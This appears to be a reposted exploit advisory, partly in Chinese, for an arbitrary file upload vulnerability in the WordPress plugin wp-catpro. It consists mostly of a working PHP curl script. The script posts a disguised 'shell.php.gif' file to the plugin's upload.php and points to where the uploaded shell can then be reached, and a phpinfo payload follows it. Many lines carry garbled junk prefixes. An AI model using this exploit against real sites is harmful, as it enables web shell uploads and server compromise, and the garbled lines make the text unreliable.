WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
8 b' ]* Z2 N* C4 t( @+ D3 u$ C
作者  => Zikou-16
; c  j( O: y% u& q) K9 T2 y8 D5 ^3 M邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
5 f0 F$ a; h. L# g3 {下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit 信息:
& z4 O* Y- y  F$ |3 u------------------
# 攻击者可以上传 file/shell.php.gif
5 P' ?  ^: x9 z0 y# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
9 L3 C5 |; Q4 M' D7 L# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

; f' B1 @) @. f) U2 @/ w. X#=> Exploit
$ w9 z8 P  T9 v. w" y" |8 ~# n-----------
0 L# h$ {) ?; ]# ~& R# F<?php
$ V, g7 |, ^8 P
$uploadfile="zik.php.gif";
' F- V+ A* K* i5 `0 C: k( V' `$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
& J7 ]1 K3 ^, O: O* ncurl_setopt($ch, CURLOPT_POST, true);
; @1 y4 `. ^. Q8 T9 O" Z! wcurl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
' f( S  G8 V9 H! f- i$ M$postResult = curl_exec($ch);
7 w) s1 [: T. z8 Z* Jcurl_close($ch);

% u8 b) }* o+ ~1 u$ Sprint "$postResult";
: u+ o4 A0 o6 X6 L+ X( t* z! E# r
1 P* E. A- b/ i+ G% L! DShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
! x5 y2 x' H5 L2 x  ?>
2 `" k$ t; B% }& ?<?php
phpinfo();
?>